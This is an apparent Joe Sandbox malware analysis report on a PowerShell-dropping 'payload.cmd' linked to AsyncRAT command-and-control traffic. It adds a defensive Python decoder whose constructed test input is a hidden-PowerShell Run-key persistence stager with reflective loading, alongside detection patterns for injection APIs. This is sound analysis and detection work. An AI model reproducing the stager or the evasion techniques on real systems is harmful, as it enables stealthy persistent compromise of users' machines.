Windows Analysis Report
payload.cmd

Overview

General Information

Sample name: payload.cmd
Analysis ID: 1524983
MD5: 19fc666f7494d78a55d6b50a0252c214
SHA1: 8876cd520507cbfdc2e89e449baba52232a1df1b
SHA256: e96f8f61e3af77c429ae6af54c128f7b8420a45a0a63bdfcacd682773b8e5fc1
Tags: azure-winsecure-com, cmd, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious command line found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
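Several of the Sigma hits above (Base64 Encoded PowerShell Command, PowerShell Base64 Encoded FromBase64String Cmdlet, Potential PowerShell Command Line Obfuscation, Very long command line) key on the same encoding layers a .cmd dropper of this kind wraps its PowerShell stage in. The Python below is an added triage example, not code from the report, from Joe Sandbox or from the sample: it peels an -EncodedCommand blob (always UTF-16LE) and any inline FromBase64String('...') literal, recurses into each decoded layer, and tags what it finds. Because the report does not reproduce the dropper's real command line, build_sample_cmdline() fabricates a nested one of the same shape; the length threshold, regexes and indicator names are this example's own assumptions.

```python
"""Peel the PowerShell encoding layers that the Sigma hits above key on.

Constructed input: the report does not reproduce the dropper's real command
line, so build_sample_cmdline() fabricates a nested one with the same shape
(-EncodedCommand wrapping a FromBase64String stage).  Thresholds, regexes and
indicator names are this example's own assumptions, not Joe Sandbox rules.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# -e / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE script).
ENC_SWITCH = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+['\"]?([A-Za-z0-9+/=]{16,})")
# Inline [Convert]::FromBase64String('...') literal.
FROM_B64 = re.compile(
    r"(?i)FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")
LONG_CMDLINE = 800   # characters; assumed threshold for "very long command line"
MAX_DEPTH = 5        # stop unwrapping nested layers here

@dataclass
class Finding:
    layer: int            # 0 = the raw command line, 1 = first decoded layer, ...
    kind: str             # long-cmdline | encodedcommand | frombase64string
    decoded: str
    flags: List[str] = field(default_factory=list)

def _decode_b64(blob: str) -> Optional[bytes]:
    try:
        return base64.b64decode(blob, validate=True)
    except binascii.Error:
        return None

def _to_text(raw: bytes) -> str:
    # -EncodedCommand is always UTF-16LE; FromBase64String payloads may be either.
    # ASCII text in UTF-16LE has a zero byte in every odd position.
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")

def _indicators(text: str) -> List[str]:
    # Indicator names are this example's own; they mirror signatures in the report.
    checks = [
        ("dynamic-code-load", r"(?i)Invoke-Expression|\biex\b"),
        ("reflective-assembly-load", r"(?i)\[Reflection\.Assembly\]::Load"),
        ("winapi-injection-names", r"(?i)VirtualAllocEx|WriteProcessMemory|CreateRemoteThread|NtCreateThreadEx"),
        ("persistence", r"(?i)CurrentVersion\\Run|schtasks"),
    ]
    return [name for name, rx in checks if re.search(rx, text)]

def triage(cmdline: str, layer: int = 0) -> List[Finding]:
    """Return findings for a command line, recursing into each decoded layer."""
    findings: List[Finding] = []
    if layer == 0 and len(cmdline) > LONG_CMDLINE:
        findings.append(Finding(0, "long-cmdline", f"{len(cmdline)} chars", ["very-long-command-line"]))
    if layer >= MAX_DEPTH:
        return findings
    for kind, rx in (("encodedcommand", ENC_SWITCH), ("frombase64string", FROM_B64)):
        for m in rx.finditer(cmdline):
            raw = _decode_b64(m.group(1))
            if raw is None:
                continue                      # looked like base64 but did not decode
            text = _to_text(raw)
            findings.append(Finding(layer + 1, kind, text, _indicators(text)))
            findings.extend(triage(text, layer + 1))
    return findings

def build_sample_cmdline() -> str:
    """Constructed stand-in for the dropper's command line (not taken from the report)."""
    stage2 = ("Set-ItemProperty HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "
              "-Name Updater -Value 'powershell -w hidden -nop -c iex(gp HKCU:\\Software\\Classes\\x).y'; "
              "[Reflection.Assembly]::Load($bytes) | Out-Null")
    stage1 = ("$d=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
              + base64.b64encode(stage2.encode("utf-8")).decode() + "'));Invoke-Expression $d")
    return ("powershell.exe -nop -w hidden -EncodedCommand "
            + base64.b64encode(stage1.encode("utf-16-le")).decode())

if __name__ == "__main__":
    for f in triage(build_sample_cmdline()):
        print(f"layer {f.layer} {f.kind:16} {f.flags} {f.decoded[:70]!r}")
```

On a real host the input is the CommandLine field of Security event 4688 or Sysmon event 1, or the script text from PowerShell event 4104; the same function applies unchanged. The UTF-16LE heuristic in _to_text matters because a blob that decodes to readable text under the wrong encoding looks like noise and is easy to dismiss.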

Classification

AV Detection

Source: Submitted Sample Integrated Neural Analysis Model: Matched 98.1% probability
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 38_2_00401000
Source: unknown HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.7:49720 version: TLS 1.2
Source: Binary string: System.Configuration.Install.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Data.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.pdb@` source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000033.00000002.2566233511.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127214561.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Core.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Numerics.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000002.2566233511.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127214561.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ServiceProcess.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Numerics.pdbP source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.Install.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.pdbP4 source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.pdbL source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdbM* source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.DirectoryServices.pdbirFKI source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdbP source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.DirectoryServices.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Data.ni.pdbRSDSC source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Data.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Configuration.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ServiceProcess.pdbpx' source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.pdbH source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Data.pdbH source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.pdbk. source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Core.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Transactions.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Security.pdbh source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.pdbg source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Transactions.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Numerics.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEED894 FindFirstFileExW, 20_2_000002527DEED894
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 20_2_000002527DEEDA18
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DF1D894 FindFirstFileExW, 20_2_000002527DF1D894
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DF1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 20_2_000002527DF1DA18
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000286D7D1D894 FindFirstFileExW, 21_2_00000286D7D1D894
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000286D7D1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 21_2_00000286D7D1DA18
Source: C:\Windows\System32\conhost.exe Code function: 40_2_000001D54783DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 40_2_000001D54783DA18
Source: C:\Windows\System32\conhost.exe Code function: 40_2_000001D54783D894 FindFirstFileExW, 40_2_000001D54783D894
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0922D894 FindFirstFileExW, 41_2_000001EF0922D894
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0922DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 41_2_000001EF0922DA18
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0942D894 FindFirstFileExW, 41_2_000001EF0942D894
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0942DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 41_2_000001EF0942DA18
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D1EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 42_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D1ED894 FindFirstFileExW, 42_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D21DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 42_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D21D894 FindFirstFileExW, 42_2_000001CA7D21D894
Source: C:\Windows\System32\lsass.exe Code function: 43_2_0000017D2DD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 43_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exe Code function: 43_2_0000017D2DD5D894 FindFirstFileExW, 43_2_0000017D2DD5D894
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B92DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 44_2_0000022F4B92DA18
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B92D894 FindFirstFileExW, 44_2_0000022F4B92D894
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B95DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 44_2_0000022F4B95DA18
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B95D894 FindFirstFileExW, 44_2_0000022F4B95D894
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1CDDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 45_2_00000262F1CDDA18
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1CDD894 FindFirstFileExW, 45_2_00000262F1CDD894
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1D0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 45_2_00000262F1D0DA18
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1D0D894 FindFirstFileExW, 45_2_00000262F1D0D894
Source: C:\Windows\System32\svchost.exe Code function: 46_2_0000023942B1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 46_2_0000023942B1DA18
Source: C:\Windows\System32\svchost.exe Code function: 46_2_0000023942B1D894 FindFirstFileExW, 46_2_0000023942B1D894
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF056DD894 FindFirstFileExW, 47_2_000001EF056DD894
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF056DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 47_2_000001EF056DDA18
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF0570D894 FindFirstFileExW, 47_2_000001EF0570D894
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF0570DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 47_2_000001EF0570DA18

Networking

Source: Network traffic Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 154.216.20.132:6969 -> 192.168.2.7:49719
Source: global traffic TCP traffic: 192.168.2.7:49719 -> 154.216.20.132:6969
Source: Joe Sandbox View IP Address: 195.201.57.90 195.201.57.90
Source: Joe Sandbox View ASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: ipwho.is
Source: global traffic HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
    Host: ipwho.is
    Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
    Host: ipwho.is
    Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: azure-winsecure.com
Source: global traffic DNS traffic detected: DNS query: ipwho.is
Source: Microsoft-Windows-LiveId%4Operational.evtx.53.dr String found in binary or memory: http://Passport.NET/tb
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079323162.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2590892961.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079323162.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2590892961.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079323162.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2590892961.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
